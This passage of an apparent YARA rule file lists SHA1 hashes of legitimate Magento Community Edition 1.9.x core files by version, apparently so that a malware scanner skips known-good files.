"c0db9c81f156724e5b34ce33bf584d7af6d9ec0b" or // lib/Varien/File/Uploader.php 444 | hash.sha1(0, filesize) == "4bf65c05b7f31d0b068a9586b3384f37818e83ba" or // lib/Varien/Db/Tree.php 445 | 446 | /* Magento CE 1.9.2.4 */ 447 | hash.sha1(0, filesize) == "1b93c2a04a83e7577623ee4af05c428819cb7c16" or // lib/Varien/File/Uploader.php 448 | 449 | /* Magento CE 1.9.3.0 */ 450 | hash.sha1(0, filesize) == "3f1c255821b6a821dabca2dc02bd0d88ce19a2b2" or // cron.php 451 | hash.sha1(0, filesize) == "6e9a284038a3e121052e5ff3b69d580dc3dbd387" or // app/code/core/Mage/Dataflow/Model/Profile.php 452 | hash.sha1(0, filesize) == "b2e8d4ed802a50d96711e73db12ef9e6225fd6ce" or // lib/Varien/Autoload.php 453 | 454 | /* Magento CE 1.9.3.1 */ 455 | 456 | /* Magento CE 1.9.3.2 */ 457 | hash.sha1(0, filesize) == "a5f4b3b79113406a25803258e67955ecaef58f96" or // cron.php 458 | hash.sha1(0, filesize) == "b59a9f79f93104dd0f2086ecb41b121ca83c49c5" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 459 | hash.sha1(0, filesize) == "10396708b76cffb8e5ec478e138668fe7f7fb08e" or // app/code/core/Mage/Core/Model/Translate.php 460 | hash.sha1(0, filesize) == "c3cc023db136ab16195a00821c28def911e5aa22" or // app/code/core/Mage/Dataflow/Model/Profile.php 461 | hash.sha1(0, filesize) == "0c5c35de2e11051a72842dec7fa77279076c7107" or // app/code/core/Mage/Adminhtml/Model/Url.php 462 | hash.sha1(0, filesize) == "6da6474df8515b58505301368d64b054a973be87" or // app/design/frontend/default/iphone/template/catalog/product/view/media.phtml 463 | hash.sha1(0, filesize) == "db22a8c5bac3dfecfd67be8cbb856256ce005e03" or // app/design/frontend/base/default/template/customer/widget/dob.phtml 464 | hash.sha1(0, filesize) == "c78c97ee710b3ece67398146c337593d208b763a" or // app/design/adminhtml/default/default/template/notification/toolbar.phtml 465 | hash.sha1(0, filesize) == "c395f8c60434160d0a4fdca0a9981eb4c6a13021" or // lib/Magento/Autoload/Simple.php 466 | hash.sha1(0, filesize) == "9163281f49361481293a54155b48a18f502679ea" or // lib/Mage/Autoload/Simple.php 467 | hash.sha1(0, filesize) == "6c577b685ed6a73c08abaabef945070c722e14f9" or // lib/Varien/Pear.php 468 | hash.sha1(0, filesize) == "5d7e38bd1345fa0afc6e0c1f2eec085d556da06a" or // lib/Varien/Autoload.php 469 | hash.sha1(0, filesize) == "cd52d865f0d58fe0fa993b3aaa134ed86b4ddd87" or // lib/Varien/Data/Form/Element/Gallery.php 470 | hash.sha1(0, filesize) == "a80a3a304b0abd1732e704ccc3b8f4816605052b" or // lib/Varien/Data/Form/Element/Multiline.php 471 | hash.sha1(0, filesize) == "c1cbd9d692c66deed9c4419c6c78491292aec5a0" or // lib/Varien/Db/Tree.php 472 | 473 | /* Magento CE 1.9.3.3 */ 474 | 475 | /* Magento CE 1.9.3.4 */ 476 | 477 | /* Magento CE 1.9.3.6 */ 478 | hash.sha1(0, filesize) == "45ffcf03c297d29169d2fd00790ff8eb83ef5fec" or // app/code/core/Zend/Serializer/Adapter/PhpCode.php 479 | hash.sha1(0, filesize) == "294d413697f3461aa1b20dab404040eb483cec95" or // app/design/adminhtml/default/default/template/notification/toolbar.phtml 480 | 481 | /* Magento CE 1.9.3.7 */ 482 | 483 | /* Magento CE 1.9.3.8 */ 484 | hash.sha1(0, filesize) == "fb7414b830abc653d624019a18689d4dd69d7f90" or // cron.php 485 | hash.sha1(0, filesize) == "06f0a6333273222b5e39b7e9e8c5e3ef764d639b" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 486 | hash.sha1(0, filesize) == "8bb1ce05c51baff0b8fe24c4320e22fcd18bbc47" or // app/code/core/Mage/Core/Model/Translate.php 487 | hash.sha1(0, filesize) == "b4aab58ed7efbe7aa809c1aae2fe90494a3d403e" or // app/code/core/Mage/Dataflow/Model/Profile.php 488 | hash.sha1(0, filesize) == "28f900ea871d38dfdb5347f1c9861a7621825a2d" or // app/code/core/Mage/Adminhtml/Model/Url.php 489 | hash.sha1(0, filesize) == "7d84d41fee5ec9e6825654a1ef4ea785bb1eda29" or // app/design/frontend/default/iphone/template/catalog/product/view/media.phtml 490 | hash.sha1(0, filesize) == "7ae589b2fa62b74e0075da5c5c3cba8282df7c4c" or // app/design/frontend/base/default/template/customer/widget/dob.phtml 491 | hash.sha1(0, filesize) == "fd489abda5b880c3c24fd48f7f8388917a119c19" or // app/design/adminhtml/default/default/template/notification/toolbar.phtml 492 | hash.sha1(0, filesize) == "ca8a29edddc5deccc47e95da68a20d557abd7621" or // lib/Magento/Autoload/Simple.php 493 | hash.sha1(0, filesize) == "7035f2cfad6f0936bd5c533fa26379440484c82c" or // lib/Mage/Autoload/Simple.php 494 | hash.sha1(0, filesize) == "79ee56a5b2a661467cf0b90060e98085a94bcd91" or // lib/Varien/Pear.php 495 | hash.sha1(0, filesize) == "b6abca064319d3f94430b0545e5d2e1eec4e1ea7" or // lib/Varien/Autoload.php 496 | hash.sha1(0, filesize) == "476d8b4554f8bf9cfe6d77c056eaf201eee1348a" or // lib/Varien/Data/Form/Element/Gallery.php 497 | hash.sha1(0, filesize) == "78694d3161b6dee34635eaf3dda65259d0045443" or // lib/Varien/Data/Form/Element/Multiline.php 498 | hash.sha1(0, filesize) == "14551c7936764a457729f2ceba437f6c4e829fbd" or // lib/Varien/Db/Tree.php 499 | 500 | /* Magento CE 1.9.3.9 */ 501 | hash.sha1(0, filesize) == "b6b6747a3d7f3f54e150fbfc0ae9f22068276f57" or // cron.php 502 | 503 | false 504 | } 505 | --------------------------------------------------------------------------------